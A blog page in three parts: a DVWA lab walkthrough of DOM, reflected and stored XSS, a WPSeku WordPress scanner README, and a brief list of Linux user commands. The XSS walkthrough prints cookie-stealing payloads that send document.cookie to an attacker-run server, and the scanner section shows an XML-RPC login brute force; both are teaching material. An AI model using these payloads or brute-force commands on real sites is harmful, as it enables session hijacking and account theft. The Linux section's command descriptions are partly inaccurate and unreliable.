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Saturday, April 25, 2020

Learning Web Pentesting With DVWA Part 4: XSS (Cross Site Scripting)

In this article we are going to solve the Cross-Site Scripting Attack (XSS) challenges of DVWA app. Lets start by understanding what XSS attacks are. OWASP defines XSS as: "Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
An attacker can use XSS to send a malicious script to an unsuspecting user. The end user's browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page."
XSS attacks are usually used to steal user cookies which let attackers control the victim's account or to deface a website. The severity of this attack depends on what type of account is compromised by the attacker. If it is a normal user account, the impact may not be that much but if it is an admin account it could lead to compromise of the whole app or even the servers.

DOM, Sources, and Sinks:

DVWA has three types of XSS challenges. We'll describe them as we go through them in this article. But before we go about to solve these challenges we need to understand few things about a browser. We need to know what Document Object Model (DOM) is and what are sources & sinks. DOM is used by browsers as a hierarchical representation of elements in the webpage. Wikipedia defines DOM as "a cross-platform and language-independent interface that treats an XML or HTML document as a tree structure wherein each node is an object representing a part of the document. The DOM represents a document with a logical tree". A source can be described simply as input that a user supplies. And a sink can be defined as "potentially dangerous JavaScript function or DOM object that can cause undesirable effects if attacker-controlled data is passed to it". Javascript function eval() is an example of a sink.

DOM Based XSS:

Now lets solve our first XSS challenge which is a DOM based XSS challenge. DOM based XSS occurs when sources are passed to sinks without proper validation. An attacker passes specifically crafted input to the sink to cause undesirable effects to the web app.
"Fundamentally, DOM-based vulnerabilities arise when a website passes data from a source to a sink, which then handles the data in an unsafe way in the context of the client's session."
On the DVWA app click on XSS (DOM), you will be presented with a page like this:
Keep an eye over the URL of the page. Now select a language and click the Select button. The URL should look like this now:
http://localhost:9000/vulnerabilities/xss_d/?default=English
We are making a GET request to the server and sending a default parameter with the language that we select. This default parameter is the source and the server is passing this source to the sink directly without any validation. Now lets try to exploit this vulnerability by changing the URL to this:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>alert(XSS)</script>
When we hit enter after modifying the URL in the URL bar of the browser we should see an alert box popup with XSS written on it. This proves that the app is passing the data from source to sink without any validation now its time that we steal some cookies. Open another terminal or tab and setup a simple http server using python3 like this:
python3 -m http.server
By default the python http server runs on port 8000. Now lets modify the URL to steal the session cookies:
http://localhost:9000/vulnerabilities/xss_d/?default=<script>new Image().src="http://localhost:8000/?c="+document.cookie;</script>
The payload we have used here is from the github repository Payload all the things. It is an awesome repository of payloads. In this script, we define a new image whose source will be our python http server and we are appending user cookies to this request with the help of document.cookie javascript function. As can be seen in the image we get a request from the page as soon as the page loads with our xss payload and can see user cookies being passed with the request. That's it we have stolen the user cookies.

Reflected XSS:

Another type of XSS attack is called Reflected XSS Attack. OWASP describes Reflected XSS as those attacks "where the injected script is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request."
To perform this type of attack, click on XSS (Reflected) navigation link in DVWA. After you open the web page you are presented with an input field that asks you to input your name.
Now just type your name and click on submit button. You'll see a response from server which contains the input that you provided. This response from the server which contains the user input is called reflection. What if we submit some javascript code in the input field lets try this out:
<script>alert("XSS")</script>
After typing the above javascript code in the input field click submit. As soon as you hit submit you'll see a pop-up on the webpage which has XSS written on it. In order to steal some cookies you know what to do. Lets use another payload from payload all the things. Enter the code below in the input field and click submit:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Here we are using img html tag and its onerror attribute to load our request. Since image x is not present on the sever it will run onerror javascipt function which performs a GET request to our python http server with user cookies. Like we did before.
Referencing OWASP again, it is mentioned that "Reflected attacks are delivered to victims via another route, such as in an e-mail message, or on some other website. When a user is tricked into clicking on a malicious link, submitting a specially crafted form, or even just browsing to a malicious site, the injected code travels to the vulnerable web site, which reflects the attack back to the user's browser. The browser then executes the code because it came from a "trusted" server. Reflected XSS is also sometimes referred to as Non-Persistent or Type-II XSS."
Obviously you'll need your super awesome social engineering skills to successfully execute this type of attack. But yeah we are good guys why would we do so?

Stored XSS:

The last type of XSS attack that we are going to see is Stored XSS Attack. OWASP describes Stored XSS attacks as those attacks "where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-I XSS."
To perform this type of XSS attack, click on XSS (Stored) navigation link in DVWA. As the page loads, we see a Guestbook Signing form.
In this form we have to provide our name and message. This information (name and message) is being stored in a database. Lets go for a test spin. Type your name and some message in the input fields and then click Sign Guestbook. You should see your name and message reflected down below the form. Now what makes stored XSS different from reflected XSS is that the information is stored in the database and hence will persist. When you performed a reflected XSS attack, the information you provided in the input field faded away and wasn't stored anywhere but during that request. In a stored XSS however our information is stored in the database and we can see it every time we visit the particular page. If you navigate to some other page and then navigate back to the XSS (Stored) page you'll see that your name and message is still there, it isn't gone. Now lets try to submit some javascript in the message box. Enter a name in the name input field and enter this script in the message box:
<script>alert(XSS)</script>
When we click on the Sign Guestbook button, we get a XSS alert message.
Now when you try to write your cookie stealing payload you notice you cannot put your payload in the box as the maximum input length for the textarea is set to 50. To get rid of this restriction, right-click on the textarea box and click inspect. Change or delete the maxlength="50" attribute in code:
<textarea name="mtxMessage" cols="50" rows="3" maxlength="50"></textarea>
to something like this:
<textarea name="mtxMessage" cols="50" rows="3"></textarea>
And now use your payload to steal some cookies:
<img src=x onerror=this.src="http://localhost:8000/?c="+document.cookie />
Everytime a user visits this page you'll get his/her cookies (Sweet...). You don't need to send any links or try your super powerful social engineering skills to get user cookies. Your script is there in the database it will be loaded everytime a user visits this vulnerable page.
This is it for today see you next time.

References:

  1. DOM-based vulnerabilities: https://portswigger.net/web-security/dom-based
  2. DOM-based XSS: https://portswigger.net/web-security/cross-site-scripting/dom-based
  3. Document Object Model: https://en.wikipedia.org/wiki/Document_Object_Model
  4. Payload All the Things: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection
  5. Cross Site Scripting (XSS): https://owasp.org/www-community/attacks/xss/
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WPSeku V0.4 - Wordpress Security Scanner



WPSeku is a black box WordPress vulnerability scanner that can be used to scan remote WordPress installations to find security issues.

Installation
$ git clone https://github.com/m4ll0k/WPSeku.git wpseku
$ cd wpseku
$ pip3 install -r requirements.txt
$ python3 wpseku.py

Usage

Generic Scan
python3 wpseku.py --url https://www.xxxxxxx.com --verbose

  • Output
----------------------------------------
_ _ _ ___ ___ ___| |_ _ _
| | | | . |_ -| -_| '_| | |
|_____| _|___|___|_,_|___|
|_| v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Target: https://www.xxxxxxx.com
[ + ] Starting: 02:38:51

[ + ] Server: Apache
[ + ] Uncommon header "X-Pingback" found, with contents: https://www.xxxxxxx.com/xmlrpc.php
[ i ] Checking Full Path Disclosure...
[ + ] Full Path Disclosure: /home/ehc/public_html/wp-includes/rss-functions.php
[ i ] Checking wp-config backup file...
[ + ] wp-config.php available at: https://www.xxxxxxx.com/wp-config.php
[ i ] Checking common files...
[ + ] robots.txt file was found at: https://www.xxxxxxx.com/robots.txt
[ + ] xmlrpc.php file was found at: https://www.xxxxxxx.com/xmlrpc.php
[ + ] readme.html file was found at: https://www.xxxxxxx.com/readme.html
[ i ] Checking directory listing...
[ + ] Dir "/wp-admin/css" listing enable at: https://www.xxxxxxx.com/wp-admin/css/
[ + ] Dir "/wp-admin/images" listing enable at: https://www.xxxxxxx.com/wp-admin/images/
[ + ] Dir "/wp-admin/includes" listing enable at: https://www.xxxxxxx.com/wp-admin/includes/
[ + ] Dir "/wp-admin/js" listing enable at: https://www.xxxxxxx.com/wp-admin/js/
......

Bruteforce Login
python3 wpseku.py --url https://www.xxxxxxx.com --brute --user test --wordlist wl.txt --verbose

  • Output
----------------------------------------
_ _ _ ___ ___ ___| |_ _ _
| | | | . |_ -| -_| '_| | |
|_____| _|___|___|_,_|___|
|_| v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Target: https://www.xxxxxxx.com
[ + ] Starting: 02:46:32

[ + ] Bruteforcing Login via XML-RPC...
[ i ] Setting user: test
[ + ] Valid Credentials:

-----------------------------
| Username | Passowrd |
-----------------------------
| test | kamperasqen13 |
-----------------------------

Scan plugin,theme and wordpress code
python3 wpseku.py --scan <dir/file> --verbose

Note: Testing Akismet Directory Plugin https://plugins.svn.wordpress.org/akismet
  • Output
----------------------------------------
_ _ _ ___ ___ ___| |_ _ _
| | | | . |_ -| -_| '_| | |
|_____| _|___|___|_,_|___|
|_| v0.4.0

WPSeku - Wordpress Security Scanner
by Momo Outaadi (m4ll0k)
----------------------------------------

[ + ] Checking PHP code...
[ + ] Scanning directory...
[ i ] Scanning trunk/class.akismet.php file
----------------------------------------------------------------------------------------------------------
| Line | Possibile Vuln. | String |
----------------------------------------------------------------------------------------------------------
| 597 | Cross-Site Scripting | [b"$_GET['action']", b"$_GET['action']"] |
| 601 | Cross-Site Scripting | [b"$_GET['for']", b"$_GET['for']"] |
| 140 | Cross-Site Scripting | [b"$_POST['akismet_comment_nonce']", b"$_POST['akismet_comment_nonce']"] |
| 144 | Cross-Site Scripting | [b"$_POST['_ajax_nonce-replyto-comment']"] |
| 586 | Cross-Site Scripting | [b"$_POST['status']", b"$_POST['status']"] |
| 588 | Cross-Site Scripting | [b"$_POST['spam']", b"$_POST['spam']"] |
| 590 | Cross-Site Scripting | [b"$_POST['unspam']", b"$_POST['unspam']"] |
| 592 | Cross-Site Scripting | [b"$_POST['comment_status']", b"$_POST['comment_status']"] |
| 599 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"] |
| 214 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
| 403 | Cross-Site Scripting | [b"$_SERVER['REQUEST_TIME_FLOAT']", b"$_SERVER['REQUEST_TIME_FLOAT']"] |
| 861 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']", b"$_SERVER['REMOTE_ADDR']"] |
| 930 | Cross-Site Scripting | [b"$_SERVER['HTTP_USER_AGENT']", b"$_SERVER['HTTP_USER_AGENT']"] |
| 934 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
| 1349 | Cross-Site Scripting | [b"$_SERVER['REMOTE_ADDR']"] |
----------------------------------------------------------------------------------------------------------
[ i ] Scanning trunk/wrapper.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/akismet.php file
-----------------------------------------------
| Line | Possibile Vuln. | String |
-----------------------------------------------
| 55 | Authorization Hole | [b'is_admin()'] |
-----------------------------------------------
[ i ] Scanning trunk/class.akismet-cli.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/class.akismet-widget.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/index.php file
[ + ] Not found vulnerabilities
[ i ] Scanning trunk/class.akismet-admin.php file
--------------------------------------------------------------------------------------------------------------------
| Line | Possibile Vuln. | String |
--------------------------------------------------------------------------------------------------------------------
| 39 | Cross-Site Scripting | [b"$_GET['page']", b"$_GET['page']"] |
| 134 | Cross-Site Scripting | [b"$_GET['akismet_recheck']", b"$_GET['akismet_recheck']"] |
| 152 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
| 190 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
| 388 | Cross-Site Scripting | [b"$_GET['recheckqueue']"] |
| 841 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
| 843 | Cross-Site Scripting | [b"$_GET['view']", b"$_GET['view']"] |
| 850 | Cross-Site Scripting | [b"$_GET['action']"] |
| 851 | Cross-Site Scripting | [b"$_GET['action']"] |
| 852 | Cross-Site Scripting | [b"$_GET['_wpnonce']", b"$_GET['_wpnonce']"] |
| 868 | Cross-Site Scripting | [b"$_GET['token']", b"$_GET['token']"] |
| 869 | Cross-Site Scripting | [b"$_GET['token']"] |
| 873 | Cross-Site Scripting | [b"$_GET['action']"] |
| 874 | Cross-Site Scripting | [b"$_GET['action']"] |
| 1005 | Cross-Site Scripting | [b"$_GET['akismet_recheck_complete']"] |
| 1006 | Cross-Site Scripting | [b"$_GET['recheck_count']"] |
| 1007 | Cross-Site Scripting | [b"$_GET['spam_count']"] |
| 31 | Cross-Site Scripting | [b"$_POST['action']", b"$_POST['action']"] |
| 256 | Cross-Site Scripting | [b"$_POST['_wpnonce']"] |
| 260 | Cross-Site Scripting | [b'$_POST[$option]', b'$_POST[$option]'] |
| 267 | Cross-Site Scripting | [b"$_POST['key']"] |
| 392 | Cross-Site Scripting | [b"$_POST['offset']", b"$_POST['offset']", b"$_POST['limit']", b"$_POST['limit']"] |
| 447 | Cross-Site Scripting | [b"$_POST['id']"] |
| 448 | Cross-Site Scripting | [b"$_POST['id']"] |
| 460 | Cross-Site Scripting | [b"$_POST['id']", b"$_POST['url']"] |
| 461 | Cross-Site Scripting | [b"$_POST['id']"] |
| 464 | Cross-Site Scripting | [b"$_POST['url']"] |
| 388 | Cross-Site Scripting | [b"$_REQUEST['action']", b"$_REQUEST['action']"] |
| 400 | Cross-Site Scripting | [b"$_SERVER['HTTP_REFERER']", b"$_SERVER['HTTP_REFERER']"] |
--------------------------------------------------------------------------------------------------------------------
[ i ] Scanning trunk/class.akismet-rest-api.php file
[ + ] Not found vulnerabilities

Credits and Contributors
Original idea and script from WPScan Team (https://wpscan.org/)
WPScan Vulnerability Database (https://wpvulndb.com/api)




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Top Users Command In Linux Operating System With Descriptive Definitions


Linux is a command line interface and has a graphical interface as well. But the only thing we should know how we interact with Linux tools and applications with the help of command line. This is the basic thing of Linux.  As you can do things manually by simple clicking over the programs just like windows to open an applications. But if you don't have any idea about commands of Linux and definitely you also don't know about the Linux terminal. You cannot explore Linux deeply. Because terminal is the brain of the Linux and you can do everything by using Linux terminal in any Linux distribution. So, if you wanna work over the Linux distro then you should know about the commands as well.
In this blog you will get a content about commands of Linux which are collectively related to the system users. That means if you wanna know any kind of information about the users of the system like username passwords and many more.

id

The "id" command is used in Linux operating system for the sake of getting knowledge about active user id with login and group. There may be different users and you wanna get a particular id of the user who is active at that time so for this you just have to type this command over the terminal.

last

The "last" command is used in Linux operating system to show the information about the last logins on the system. If you forget by which user id you have logged in at last time. So for this information you can search login detail by using this command.

who

The "who" command is used in Linux distributions to display the information about the current user which a an active profile over the Linux operating system. If you are in the system and you don't know about that active user and suddenly you have to know about that user detail so you can get the info by using this command.

groupadd

The "groupadd admin" is the command which is used in Linux operating system to add a group in the Linux system to gave the privileges to that group.

useradd

The "useradd" command is used in Linux operating system to add user or users to a specific group. If you wanna add a user name Umer so for this matter you just have to write a command i.e. useradd -c "Umer".

userdel

The "userdel" command is used in Linux operating system for the purpose to delete any user or users from the particular group present in the linux operating system. For example "userdel Umer" this command will delete the user named Umer.

adduser

The "adduser" command is a simple command used to create directly any user in the system. There is no need to make a group for this. You just have to type the command with user name like adduser Umer, it will created a user by name Umer.

usermod

The "usermod" is a command used in Linux operating system to modify the information of any particular user. You can edit or delete information of any particular user in the Linux operating system.


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